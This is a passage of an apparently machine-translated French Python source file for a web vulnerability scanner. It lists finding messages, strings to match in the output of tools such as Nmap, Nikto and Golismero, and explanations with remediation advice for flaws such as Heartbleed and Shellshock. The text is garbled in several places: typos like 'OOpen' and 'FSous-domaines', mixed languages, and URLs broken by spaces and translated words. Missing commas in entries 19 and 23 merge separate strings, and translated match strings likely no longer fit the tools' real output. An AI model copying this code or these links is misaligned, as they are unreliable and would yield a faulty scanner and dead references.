["Vulnérabilité HEARTBLEED trouvée avec Golismero.","e",14],
["OOpen Files Found avec Golismero BruteForce.","m",25],
["Open Directories Found avec Golismero BruteForce.","m",26],
["DB Banner récupéré avec SQLMap.","f",27],
["épertoires ouverts trouvés avec DirB.","m",26],
["XSSer a trouvé des vulnérabilités XSS.","c",28],
["Trouvé des vulnérabilités SSL liées à Golismero.","m",29],
["Transfert de zone réussi avec Golismero. Reconfigurer DNS immédiatement.","e",10],
["Golismero Nikto Plugin a découvert des vulnérabilités.","m",30],
["FSous-domaines trouvés avec Golismero.","m",31],
["Transfert de zone réussi avec DNSEnum. Reconfigurer DNS immédiatement.","e",10],
["Sous-domaines trouvés avec Fierce.","m",31],
["Adresses email découvertes avec DMitry.","f",9],
["Sous-domaines découverts avec DMitry.","m",31],
["Telnet Service Detected.","e",32],
["Vulnérable à STUXNET.", "c", 34],
["WebDAV activé.", "m", 35],
["Trouvé des informations à travers Fingerprinting.", "f", 36],
["Ouvrir les fichiers trouvés avec Uniscan.", "m", 25],
["Open Directories Found with Uniscan.", "m", 26],
["Vulnérable aux stress tests.", "e", 37],
["Uniscan a détecté un possible LFI, RFI ou RCE.", "e", 38],
["Uniscan a détecté une éventuelle XSS, SQLi, BSQLi.", "e", 39],
["En-tête XSS non présent dans Apache Expect.", "m", 12],
["Sous-domaines trouvés avec Nikto.", "m", 31],
["Serveur Web vulnérable au bogue Shellshock.", "c", 40],
["Le serveur Web présente une adresse IP interne.", "f", 41],
["Méthodes HTTP PUT DEL activées.", "m", 42],
["Quelques en-têtes vulnérables exposés.", "m", 43],
["Serveur Web vulnérable à MS10-070.", "e", 44],
["Quelques problèmes trouvés sur le serveur Web.", "m", 30],
["Le serveur Web est obsolète.", "e", 45],
["Quelques problèmes rencontrés avec les options HTTP.", "f", 42],
["CGI Directories Enumerated.", "f", 26],
["Vulnérabilités identifiées dans les scans SSL.", "m", 29],
["Fichiers intéressants détectés.", "m", 25],
["Chemins injectables détectés.", "f", 46],
["Sous-domaines trouvés avec DNSMap.", "m", 31],
["Service de base de données MS-SQL détecté.", "f", 47],
["Service de base de données MySQL détecté.", "f", 47],
["Service ORACLE DB détecté.", "f", 47],
["Serveur RDP détecté sur UDP.", "e", 48],
["Serveur RDP détecté sur TCP.", "e", 48],
["Les ports TCP sont ouverts", "f", 8],
["Les ports UDP sont ouverts", "f", 8],
["Service SNMP détecté.", "m", 49],
["Elmah est configuré.", "m", 50],
["Les ports SMB sont ouverts sur TCP", "m", 51],
["Les ports SMB sont ouverts sur UDP", "m", 51],
["Wapiti a découvert une série de vulnérabilités", "e", 30],
["IIS WebDAV est activé", "m", 35],
["La protection X-XSS n'est pas présente", "m", 12]
]
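# outils_status: per-tool detection data -- apparently [string matched in the tool output,
# a match/negation flag, duration indicator dot, estimated scan time, short log name, list of error strings].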
outils_status = [
["a IPv6", 1, proc_fible, "<15s", "ipv6", ["introuvable", "a IPv6"]],
["Erreur de serveur", 0, proc_fible, "<30s", "asp.netmisconf", ["incapable de résoudre l'adresse de l'host", "Connexion expirée"]],
["wp-login", 0, proc_fible, "<30s", "wpcheck", ["impossible de résoudre l'adresse de l'host", "connexion expirée"]],
["drupal", 0, proc_fible, "<30s", "drupalcheck", ["incapable de résoudre l'adresse de l'host", "La connexion a expiré"]],
["joomla", 0, proc_fible, "<30s", "joomlacheck", ["incapable de résoudre l'adresse de l'host", "La connexion a expiré"]],
["[+]", 0, proc_fible, "<40s", "robotscheck", ["Utilisation de la valeur non initialisée dans unpack à"]],
["No WAF", 0, proc_fible, "<45s", "wafcheck", ["semble être en panne"]],
["tcp open", 0, proc_med, "<2m", "nmapopen", ["Impossible de résoudre"]],
["Aucun email trouvé", 1, proc_med, "<3m", "moissonneuse", ["Aucun host trouvé", "Aucun email trouvé"]],
["[+] Le transfert de zone a réussi !!", 0, proc_fible, "<20s", "dnsreconzt", ["Impossible de résoudre le domaine"]],
["Whoah, ça a marché", 0, proc_fible, "<30s", "fiercezt", ["none"]],
["0 erreurs", 0, proc_fible, "<35s", "dnswalkzt", ["!!! 0 échecs, 0 avertissements, 3 erreurs."]],
["Email Email:", 0, proc_fible, "<25s", "whois", ["Aucune correspondance pour le domaine"]],
["Le filtre XSS est désactivé", 0, proc_fible, "<20s", "nmapxssh", ["Échec de la résolution"]],
["VULNERABLE", 0, proc_haut, "<45m", "nmapdos", ["Échec de la résolution"]],
["Le serveur est vulnérable à Heartbleed", 0, proc_fible, "<40s", "sslyzehb", ["Impossible de résoudre le nom d'host"]],
["VULNERABLE", 0, proc_fible, "<30s", "nmap1", ["Impossible de résoudre"]],
["VULNERABLE", 0, proc_fible, "<35s", "nmap2", ["Impossible de résoudre"]],
["VULNERABLE", 0, proc_fible, "<35s", "nmap3", ["Impossible de résoudre"]],
["VULNERABLE", 0, proc_fible, "<30s", "nmap4", ["Impossible de résoudre"]],
["VULNERABLE", 0, proc_fible, "<35s", "nmap5", ["Impossible de résoudre"]],
["ERREUR - l'état de la réponse OCSP n'aboutit pas", 0, proc_fible,"<25s", "sslyze1", ["Impossible de résoudre le nom d'host"]],
["VULNERABLE", 0, proc_fible, "<30s", "sslyze2", ["Impossible de résoudre le nom d'host"]],
["VULNERABLE", 0, proc_fible, "<25s", "sslyze3", ["Impossible de résoudre le nom d'host"]],
["VULNERABLE", 0, proc_fible, "<30s", "sslyze4", ["Impossible de résoudre le nom d'host"]],
["N'utilise PAS l'équilibrage de charge", 0, proc_med, "<4m", "lbd", ["NON TROUVE"]],
["Aucune vulnérabilité trouvée", 1, proc_fible, "<45s", "golism1", ["Impossible de résoudre le nom de domaine", "Aucune vulnérabilité trouvée"]],
["Aucune vulnérabilité trouvée", 1, proc_fible, "<40s", "golism2", ["Impossible de résoudre le nom de domaine", "Aucune vulnérabilité trouvée"]],
["Aucune vulnérabilité trouvée", 1, proc_fible, "<45s", "golism3", ["Impossible de résoudre le nom de domaine", "Aucune vulnérabilité trouvée"]],
["Aucune vulnérabilité trouvée", 1, proc_fible, "<40s", "golism4", ["Impossible de résoudre le nom de domaine", "Aucune vulnérabilité trouvée"]],
["Aucune vulnérabilité trouvée", 1, proc_fible, "<45s", "golism5", ["Impossible de résoudre le nom de domaine", "Aucune vulnérabilité trouvée"]],
["TROUVE: 0", 1, proc_haut, "<35m", "dirb", ["PEU NE RÉSOLVE host", "TROUVE: 0"]],
["Impossible de trouver une vulnérabilité!", 1, proc_med, "<4m", "xsser", ["XSSer ne fonctionne pas correctement!", "Impossible de trouver une vulnérabilité!"]],
["ID d’occurrence", 0, proc_fible, "<45s", "golism6", ["Impossible de résoudre le nom de domaine"]],
["Transfert de zone DNS réussi", 0, proc_fible, "<30s", "golism7", ["Impossible de résoudre le nom de domaine"]],
["Nikto a trouvé 0 vulnérabilités", 1, proc_med, "<4m", "golism8", ["Impossible de résoudre le nom de domaine", "Nikto a trouvé 0 vulnérabilités"]],
["Fuite possible du sous-domaine", 0, proc_haut, "<30m", "golism9", ["Impossible de résoudre le nom de domaine"]],
["Echec de la requête d'enregistrement AXFR:", 1, proc_fible, "<45s", "dnsenumzt", ["La requête d'enregistrement NS a échoué:", "Echec de la requête d'enregistrement AXFR", "aucun enregistrement NS pour"]],
["0 entrées trouvées", 1, proc_haut, "<75m", "fierce2", ["trouvé 0 entrées", "is gimp"]],
["0 message (s) trouvé (s)", 1, proc_fible, "<30s", "dmitry1", ["Impossible de localiser l'adresse IP de l'host", "0 message (s) trouvé (s)"]],
["Trouvé 0 sous-domaine (s) possible (s)", 1, proc_fible, "<35s", "dmitry2", ["Impossible de localiser l'adresse IP de l'host", "Trouvé 0 sous-domaine (s) possible"]],
["open", 0, proc_fible, "<15s", "nmaptelnet", ["Impossible de résoudre"]],
["open", 0, proc_fible, "<15s", "nmapftp", ["Impossible de résoudre le problème"]],
["open", 0, proc_fible, "<20s", "nmapstux", ["Impossible de résoudre le problème"]],
["SUCCEED", 0, proc_fible, "<30s", "webdav", ["n'est pas activé par DAV ou n'est pas accessible."]],
["Aucune vulnérabilité trouvée", 1, proc_fible, "<15s", "golism10", ["Impossible de résoudre le nom de domaine", "Aucune vulnérabilité trouvée"]],
["[+]", 0, proc_med, "<2m", "uniscan2", ["Utilisation de la valeur non initialisée dans unpack à"]],
["[+]", 0, proc_med, "<5m", "uniscan3", ["Utilisation de la valeur non initialisée dans unpack à"]],
["[+]", 0, proc_med, "<9m", "uniscan4", ["Utilisation de la valeur non initialisée dans unpack à"]],
["[+]", 0, proc_med, "<8m", "uniscan5", ["Utilisation de la valeur non initialisée dans unpack à"]],
["[+]", 0, proc_med, "<9m", "uniscan6", ["Utilisation de la valeur non initialisée dans unpack à"]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto1", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto2", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto3", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto4", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto5", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto6", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto7", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto8", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto9", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto10", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto11", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto12", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 article (s) signalé (s)", 1, proc_fible, "<35s", "nikto13", ["ERREUR: impossible de résoudre le nom d'host", "0 article (s) signalé (s)", "Aucun serveur Web trouvé", "0 host (s) testé (s) "]],
["0 élément (s) signalé (s)", 1, proc_fible, "<35s", "nikto14", "ERREUR: Impossible de résoudre le nom d'host, 0 élément (s) signalé (s)"],
["# 1", 0, proc_haut, "<30m", "dnsmap_brute", ["[+] 0 (sous) domaines et 0 adresses IP trouvées"]],
["open", 0, proc_fible, "<15s", "nmapmssql", ["Impossible de résoudre le problème"]],
["open", 0, proc_fible, "<15s", "nmapmysql", ["Impossible de résoudre"]],
["open", 0, proc_fible, "<15s", "nmaporacle", ["Impossible de résoudre le problème"]],
["open", 0, proc_fible, "<15s", "nmapudprdp", ["Impossible de résoudre"]],
["open", 0, proc_fible, "<15s", "nmaptcprdp", ["Impossible de résoudre le problème"]],
["open", 0, proc_haut, "> 50m", "nmapfulltcp", ["Impossible de résoudre"]],
["open", 0, proc_haut, "> 75m", "nmapfulludp", ["Impossible de résoudre"]],
["open", 0, proc_fible, "<30s", "nmapsnmp", ["Impossible de résoudre le problème"]],
["Journal des erreurs de Microsoft SQL Server", 0, proc_fible, "<30s", "elmahxd", ["impossible de résoudre l'adresse de l'host", "Connexion expirée"]],
["open", 0, proc_fible, "<20s", "nmaptcpsmb", ["Impossible de résoudre le problème"]],
["open", 0, proc_fible, "<20s", "nmapudpsmb", ["Impossible de résoudre le problème"]],
["Host:", 0, proc_med, "<5m", "wapiti", ["none"]],
["WebDAV est ENABLED", 0, proc_fible, "<40s", "nmapwebdaviis", ["Échec de la résolution"]],
["X-XSS-Protection [1", 1, proc_med, "<3m", "whatweb", ["Expiration du délai", "Erreur de socket", "X-XSS-Protection [1"]]
]
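# outils_correctifs: [index, vulnerability definition, remediation advice]; vul_as_info()
# reads columns [1] and [2] of the entry selected by the rep_outil index.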
outils_correctifs = [
[1, "Il ne s'agit pas d'une vulnérabilité, mais simplement d'une alerte informative. L'host ne prend pas en charge IPv6. IPv6 offre davantage de sécurité car IPSec (responsable de CIA - Confidentiality, Integrity and Availablity) est intégré à ce modèle. Il est donc bon d'avoir Prise en charge IPv6. ",
"Il est recommandé de mettre en œuvre IPv6. Vous trouverez plus d'informations sur la mise en oeuvre de IPv6 à partir de cette ressource. Https://www.cisco.com/c/en/us/solutions/collateral/enterprise/cisco-on-cisco/ IPv6-Implementation_CS.html "],
[2, "Fuite d'informations sensibles détectée. L'application ASP.Net ne filtre pas les caractères illégaux dans l'URL. L'attaquant injecte un caractère spécial (% 7C ~ .aspx) pour que l'application crache des informations sensibles sur la pile de serveurs." ,
"Il est recommandé de filtrer les caractères spéciaux dans l'URL et de définir une page d'erreur personnalisée dans de telles situations au lieu d'afficher les messages d'erreur par défaut. Cette ressource vous aide à configurer une page d'erreur personnalisée sur une application Microsoft .Net. Https: // docs.microsoft.com/en-us/aspnet/web-forms/overview/older-versions-getting-started/deploying-web-site-projects/displaying-a-custom-error-page-cs "],
[3, "Il n'est pas mauvais d'avoir un CMS dans WordPress. Il est probable que la version contienne des vulnérabilités ou que des scripts tiers associés à celle-ci puissent comporter des vulnérabilités",
"Il est recommandé de masquer la version de WordPress. Cette ressource contient plus d'informations sur la sécurisation de votre blog WordPress. Https://codex.wordpress.org/Hardening_WordPress"],
[4, "Il n'est pas mauvais d'avoir un CMS dans Drupal. Il est probable que la version contienne des vulnérabilités ou que des scripts tiers associés à celle-ci puissent comporter des vulnérabilités",
"Il est recommandé de dissimuler la version de Drupal. Cette ressource contient des informations supplémentaires sur la sécurisation de votre blog Drupal. Https://www.drupal.org/docs/7/site-building-best-practices/ensure-that- votre-site est sécurisé "],
[5, "Il n'est pas mauvais d'avoir un CMS dans Joomla. Il est probable que la version contienne des vulnérabilités ou que des scripts tiers associés à celle-ci puissent comporter des vulnérabilités",
"Il est recommandé de dissimuler la version de Joomla. Cette ressource contient des informations supplémentaires sur la sécurisation de votre blog Joomla. Https://www.incapsula.com/blog/10-tips-to-improve-your-joomla-website- security.html "],
[6, "Parfois, robots.txt ou sitemap.xml peuvent contenir des règles telles que certains liens auxquels les robots d'exploration et les moteurs de recherche ne sont pas supposés accéder / indexés. Les moteurs de recherche peuvent ignorer ces liens, mais les attaquants pourront y accéder directement. ",
"Il est judicieux de ne pas inclure de liens sensibles dans les robots ou les fichiers de sitemap."],
[7, "Sans pare-feu pour applications Web, un attaquant peut essayer d’injecter divers modèles d’attaque soit manuellement, soit à l’aide de scanners automatisés. Un scanner automatique peut envoyer des hordes de vecteurs d’attaque et des modèles pour valider une attaque. Il existe également des chances que l’application obtenir DoS`ed (déni de service) ",
"Les pare-feu pour applications Web offrent une excellente protection contre les attaques Web courantes telles que XSS, SQLi, etc. Ils offrent également une ligne de défense supplémentaire à votre infrastructure de sécurité. Cette ressource contient des informations sur les pare-feu pour applications Web qui pourraient convenir à votre application. Https: // www .gartner.com / reviews / market / web-application-firewall "],
[8, "Les ports ouverts donnent aux pirates un indice pour exploiter les services. Les pirates tentent de récupérer les informations des bannières par les ports et comprennent le type de service exécuté par l'host",
"Il est recommandé de fermer les ports des services inutilisés et d'utiliser un pare-feu pour filtrer les ports si nécessaire. Cette ressource peut donner davantage d'informations. Https://security.stackexchange.com/a/145781/6137"],
[9, "Il est très moins probable que des adresses e-mail soient utilisées pour compromettre une cible. Toutefois, les attaquants l'utilisent comme donnée complémentaire pour rassembler des informations autour de la cible. Un attaquant peut utiliser le nom d'utilisateur de l'adresse e-mail et mener des attaques en force brutale. sur les serveurs de messagerie, mais également sur d’autres panneaux légitimes tels que SSH, CMS, etc., avec une liste de mots de passe, car ils portent un nom légitime. Il s’agit toutefois d’un scénario dans le noir, l’attaquant pouvant réussir ou non, en fonction du niveau d'intérêt ",
"Etant donné que les chances d’exploitation sont faibles, il n’est pas nécessaire de prendre des mesures. Une réparation appropriée consisterait à choisir différents noms d’utilisateur pour différents services, ce qui serait plus judicieux."],
[10, "Le transfert de zone révèle des informations topologiques critiques sur la cible. L'attaquant sera en mesure d'interroger tous les enregistrements et aura des connaissances plus ou moins complètes sur votre host.",
"La bonne pratique consiste à limiter le transfert de zone en indiquant au maître quelles sont les adresses IP des esclaves auxquels l'accès peut être accordé pour la requête. Cette ressource SANS fournit des informations supplémentaires. Https://www.sans.org/reading-room/ livres blancs / dns / sécuriser-dns-zone-transfer-868 "],
[11, "L’adresse e-mail de l’administrateur et d’autres informations (adresse, téléphone, etc.) sont disponibles publiquement. Un attaquant peut utiliser ces informations pour exploiter une attaque. Ceci ne peut pas être utilisé pour mener une attaque directe, car ce n’est pas le cas. Cependant, un attaquant utilise ces données pour créer des informations sur la cible. ",
"Certains administrateurs auraient intentionnellement rendu ces informations publiques. Dans ce cas, vous pouvez les ignorer. Dans le cas contraire, il est recommandé de les masquer. Cette ressource fournit des informations sur ce correctif. Http://www.name.com/blog/ how-tos / tutorial-2/2013/06 / protégez-vos-informations-personnelles-avec-whois-privacy / "],
[12, "Comme la cible manque de cet en-tête, les anciens navigateurs seront sujets aux attaques XSS réfléchies.",
"Les navigateurs modernes ne rencontrent aucun problème avec cette vulnérabilité (en-têtes manquants). Cependant, il est vivement recommandé aux anciens navigateurs d'être mis à niveau."],
[13, "Cette attaque fonctionne en ouvrant plusieurs connexions simultanées au serveur Web et les maintient en vie aussi longtemps que possible en envoyant en continu des requêtes HTTP partielles, qui ne sont jamais terminées. Elles passent facilement à travers IDS en envoyant des requêtes partielles.",
"Si vous utilisez Apache Module,` mod_antiloris` pourrait vous aider. Pour d'autres configurations, vous pouvez trouver des solutions plus détaillées pour cette ressource. Https://www.acunetix.com/blog/articles/slow-http-dos-attacks-mitigate -apache-http-server / "],
[14, "Cette vulnérabilité porte gravement atteinte à la confidentialité des informations privées de votre host. Un attaquant peut maintenir la connexion TLS vivante et récupérer au maximum 64 Ko de données par battement de coeur.",
"PFS (Perfect Forward Secrecy) peut être implémenté pour rendre le décryptage difficile. Des informations complètes sur les mesures correctives et les ressources sont disponibles à l'adresse http://heartbleed.com/"],
[15, "By exploiting this vulnerability, an attacker will be able gain access to sensitive data in a n encrypted session such as session ids, cookies and with those data obtained, will be able to impersonate that particular user.",
"This is a flaw in the SSL 3.0 Protocol. A better remediation would be to disable using the SSL 3.0 protocol. For more information, check this resource. https://www.us-cert.gov/ncas/alerts/TA14-290A"],
[16, "This attacks takes place in the SSL Negotiation (Handshake) which makes the client unaware of the attack. By successfully altering the handshake, the attacker will be able to pry on all the information that is sent from the client to server and vice-versa",
"Upgrading OpenSSL to latest versions will mitigate this issue. This resource gives more information about the vulnerability and the associated remediation. http://ccsinjection.lepidum.co.jp/"],
[17, "Avec cette vulnérabilité, l'attaquant sera en mesure de mener une attaque par MiTM et de compromettre ainsi le facteur de confidentialité.",
"La mise à niveau de OpenSSL vers la dernière version résoudra ce problème. Les versions antérieures à 1.1.0 sont exposées à cette vulnérabilité. Vous trouverez plus d'informations dans cette ressource. Https://bobcares.com/blog/how-to-fix-sweet32- anniversaires-vulnérabilité-cve-2016-2183 / "],
[18, "Avec l'attaque LogJam, l'attaquant sera en mesure de rétrograder la connexion TLS, ce qui lui permettra de lire et de modifier les données transmises via la connexion.",
"Assurez-vous que toutes les bibliothèques TLS que vous utilisez sont à jour, que les serveurs que vous maintenez utilisent des nombres premiers de 2048 bits ou plus, et que les clients que vous gérez rejettent les nombres principaux de Diffie-Hellman inférieurs à 1024 bits. Pour plus d'informations, reportez-vous à la section ressource. https://weakdh.org/ "],
[19, "Autorise des attaquants distants à provoquer un déni de service (plantage) et éventuellement à obtenir des informations sensibles dans les applications qui utilisent OpenSSL, via un message de négociation ClientHello malformé déclenchant un accès mémoire en dehors des limites."
"Les versions OpenSSL 0.9.8h à 0.9.8q et 1.0.0 à 1.0.0c sont vulnérables. Il est recommandé de mettre à niveau la version OpenSSL. Vous trouverez plus de ressources et d’informations ici. Https://www.openssl.org/news /secadv/20110208.txt "],
[20, "autrement appelé BREACH atack, exploite la compression dans le protocole HTTP sous-jacent. Un attaquant sera en mesure d'obtenir des adresses électroniques, des jetons de session, etc., à partir du trafic Web crypté TLS.",
"Désactiver la compression TLS n'atténue pas cette vulnérabilité. La première étape consiste à désactiver la compression Zlib, suivie des autres mesures mentionnées dans cette ressource. Http://breachattack.com/"],
[21, "Appelée autrement attaque par texte brut, qui permet aux attaquants de MiTM d’insérer des données dans des sessions HTTPS et éventuellement d’autres types de sessions protégées par TLS ou SSL, en envoyant une demande non authentifiée traitée rétroactivement par un serveur contexte post-renégociation. ",
"Les étapes détaillées de la correction peuvent être trouvées dans ces ressources. Https://securingtomorrow.mcafee.com/technical-how-to/tips-securing-ssl-renegotiation/ https://www.digicert.com/news/2011- 06-03-ssl-renego / "],
[22, "Cette vulnérabilité permet à des attaquants de voler des sessions TLS existantes à des utilisateurs.",
"Le meilleur conseil est de désactiver la reprise de session. Pour renforcer la reprise de session, suivez cette ressource qui contient des informations considérables. Https://wiki.crashtest-security.com/display/KB/Harden+TLS+Session+Resumption"],
[23, "Cela n'a rien à voir avec les risques de sécurité. Toutefois, les attaquants peuvent utiliser cette indisponibilité d'équilibreurs de charge comme un avantage pour exploiter une attaque par déni de service sur certains services ou sur l'application elle-même."
"Les équilibreurs de charge sont fortement encouragés pour toutes les applications Web. Ils améliorent les performances et la disponibilité des données en cas de panne du serveur. Pour en savoir plus sur les équilibreurs de charge et leur configuration, consultez cette ressource. Https: //www.digitalocean. com / communauté / tutoriels / qu'est-ce que l'équilibrage de charge "],
[24, "Un attaquant peut transmettre des requêtes arrivant à l'URL légitime ou à l'application Web à une adresse tierce ou à l'emplacement de l'attaquant pouvant servir de logiciel malveillant et affecter l'ordinateur de l'utilisateur final.",
"Il est vivement recommandé de déployer DNSSec sur la cible de l'host. Le déploiement complet de DNSSEC garantit que l'utilisateur final se connecte au site Web ou à un autre service correspondant à un nom de domaine particulier. Pour plus d'informations, consultez cette ressource. Https: / /www.cloudflare.com/dns/dnssec/how-dnssec-works/ "],
[25, "Les attaquants peuvent trouver une quantité considérable d'informations dans ces fichiers. Il existe même des chances que les attaquants obtiennent des informations critiques à partir de ces fichiers.",
"Il est recommandé de bloquer ou de restreindre l'accès à ces fichiers, sauf en cas de nécessité."],
[26, "Les attaquants peuvent trouver une quantité considérable d'informations dans ces répertoires. Il existe même des chances que les attaquants obtiennent des informations critiques à partir de ces répertoires.",
"Il est recommandé de bloquer ou de restreindre l'accès à ces répertoires, sauf en cas de nécessité."],
[27, "Peut ne pas être vulnérable SQLi. Un attaquant sera en mesure de savoir que l'host utilise un backend pour l'opération.",
"La capture de bannières devrait être restreinte et l'accès aux services de l'extérieur devrait être réduit au minimum."],
[28, "Un attaquant sera capable de voler des cookies, de déformer une application Web ou de se rediriger vers une adresse tierce pouvant servir de logiciel malveillant.",
"La validation des entrées et la désinfection des sorties peuvent totalement empêcher les attaques XSS. Les attaques XSS peuvent être atténuées à l'avenir en suivant correctement une méthodologie de codage sécurisé. La ressource complète suivante fournit des informations détaillées sur la résolution de cette vulnérabilité. Https: // www. owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet "],
[29, "Des vulnérabilités liées à SSL annulent le facteur de confidentialité. Un attaquant peut effectuer une attaque par MiTM, intrépéter et espionner la communication.",
"Une mise en œuvre correcte et une version mise à niveau des bibliothèques SSL et TLS sont essentielles pour bloquer les vulnérabilités liées à SSL."],
[30, "Un scanner particulier a détecté plusieurs vulnérabilités qu'un attaquant pourrait tenter d'exploiter la cible.",
"Reportez-vous à MS-Rapport-de-vulnérabilite pour afficher les informations complètes de la vulnérabilité, une fois l'analyse terminée."],
[31, "Les attaquants peuvent collecter davantage d'informations sur les sous-domaines relatifs au domaine parent. Ils peuvent même rechercher d'autres services dans les sous-domaines et essayer de connaître l'architecture de la cible. L'attaquant a même des chances de trouver des vulnérabilités en tant que surface d'attaque. devient plus grand avec plus de sous-domaines découverts. ",
"Il est parfois sage de bloquer les sous-domaines tels que le développement, le déploiement vers le monde extérieur, car cela donne plus d'informations à l'attaquant sur la pile technologique. Les pratiques de nommage complexes permettent également de réduire la surface d'attaque, car les attaquants ont du mal à exécuter le sous-domaine dictionnaires et listes de mots. "],
[32, "Grâce à ce protocole obsolète, un attaquant peut être capable de mener MiTM et d'autres attaques compliquées.",
"Il est vivement recommandé de cesser d'utiliser ce service, qui est largement obsolète. SSH peut être utilisé pour remplacer TELNET. Pour plus d'informations, consultez cette ressource https://www.ssh.com/ssh/telnet"],
[33, "Ce protocole ne prend pas en charge les communications sécurisées et l’attaquant a probablement de grandes chances d’écouter la communication. En outre, de nombreux programmes FTP disposent d’exploits disponibles sur le Web, de sorte qu’un attaquant peut planter directement l’application ou obtenir un SHELL. accès à cette cible. ",
"Le correctif suggéré consiste à utiliser un protocole SSH au lieu de FTP. Il prend en charge la communication sécurisée et les chances d'attaques de MiTM sont plutôt rares."],
[34, "Le StuxNet est un ver 'worm' de niveau 3 qui expose des informations critiques sur l’organisation cible. Il s’agissait d’une cyberarme qui visait à contrecarrer le renseignement nucléaire iranien. Je me demande comment elle est arrivée ici? J'espère que ce n’est pas une fausse Nmap positif;) ",
"Il est vivement recommandé d'effectuer une analyse complète des rootkit sur l'host. Pour plus d'informations, consultez cette ressource. Https://www.symantec.com/security_response/writeup.jsp?docid=2010-071400-3123-99&tabid=3 "],
[35, "WebDAV est supposé contenir plusieurs vulnérabilités. Dans certains cas, un attaquant peut cacher un fichier DLL malveillant dans le partage WebDAV mais, après avoir convaincu un utilisateur d'ouvrir un fichier parfaitement inoffensif et légitime, exécuter du code dans le contexte de cet utilisateur ",
"Il est recommandé de désactiver WebDAV. Vous trouverez sur cette URL des ressources critiques concernant la désactivation de WebDAV. Https://www.networkworld.com/article/2202909/network-security/-webdav-is-bad---says- security-researcher.html "],
[36, "Les attaquants font toujours une empreinte digitale sur n'importe quel serveur avant de lancer une attaque. Empreinte digitale leur donne des informations sur le type de serveur, le contenu qu'ils servent, les dernières heures de modification, etc., cela donne à un attaquant plus d'informations sur la cible" ,
"Une bonne pratique consiste à masquer les informations au monde extérieur. Dans ce cas, les attaquants auront du mal à comprendre la technologie du serveur et par conséquent à tirer parti d'une attaque."],
[37, "Les pirates tentent généralement de rendre inutilisables les applications ou les services Web en inondant la cible, en bloquant l'accès aux utilisateurs légitimes. Cela peut affecter les activités d'une entreprise ou d'une organisation ainsi que la réputation",
"En veillant à ce que les équilibreurs de charge appropriés soient en place, en configurant des limites de débit et de multiples restrictions de connexion, ces attaques peuvent être considérablement atténuées."],
[38, "Les intrus pourront inclure à distance des fichiers shell et accéder au système de fichiers principal. Ils pourront également lire tous les fichiers. Il est encore plus probable que l’attaquant exécute du code à distance système de fichiers.",
"Les pratiques en matière de code sécurisé préviendront principalement les attaques par LFI, RFI et RCE. La ressource suivante fournit des informations détaillées sur les pratiques de codage sécurisé. Https://wiki.sei.cmu.edu/confluence/display/seccode/Top+10+Secure+ Codage + Pratiques "],
[39, "Les pirates seront capables de voler des données sur le backend. Ils pourront également s’authentifier sur le site et se faire passer pour n'importe quel utilisateur car ils ont le contrôle total sur le backend. Ils peuvent même effacer toute la base de données. Les attaquants peuvent aussi voler les informations de cookie d'un utilisateur authentifié et il peut même rediriger la cible vers une adresse malveillante ou altérer totalement l'application. ",
"La validation des entrées doit être effectuée correctement avant toute interrogation directe des informations de la base de données. Un développeur doit se rappeler de ne pas faire confiance aux entrées des utilisateurs finaux. En suivant une méthodologie de codage sécurisé, attaquez comme SQLi, XSS et BSQLi. Les guides de ressources suivants mettre en œuvre une méthodologie de codage sécurisé pour le développement d'applications. https://wiki.sei.cmu.edu/confluence/display/seccode/Top+10+Secure+Coding+Practices "],
[40, "Des attaquants exploitent la vulnérabilité de BASH pour exécuter du code à distance sur la cible. Un attaquant expérimenté peut facilement prendre le contrôle du système cible et accéder aux sources internes de la machine",
"Cette vulnérabilité peut être atténuée en appliquant un correctif à la version de BASH. La ressource suivante fournit une analyse approfondie de la vulnérabilité et de la façon de la réduire. Https://www.symantec.com/connect/blogs/shellshock-all-you-need -know-about-bash-bug-vulnérabilité https://www.digitalocean.com/community/tutorials/how-to-protect-your-server-against-the-shellshock-bash-vulnerability "],
[41, "Donne à l'attaquant une idée de la façon dont la configuration des adresses est effectuée en interne sur le réseau de l'organisation. La découverte des adresses privées utilisées au sein d'une organisation peut aider les attaquants à mener des attaques au niveau de la couche réseau visant à pénétrer l'infrastructure interne de l'entreprise.",
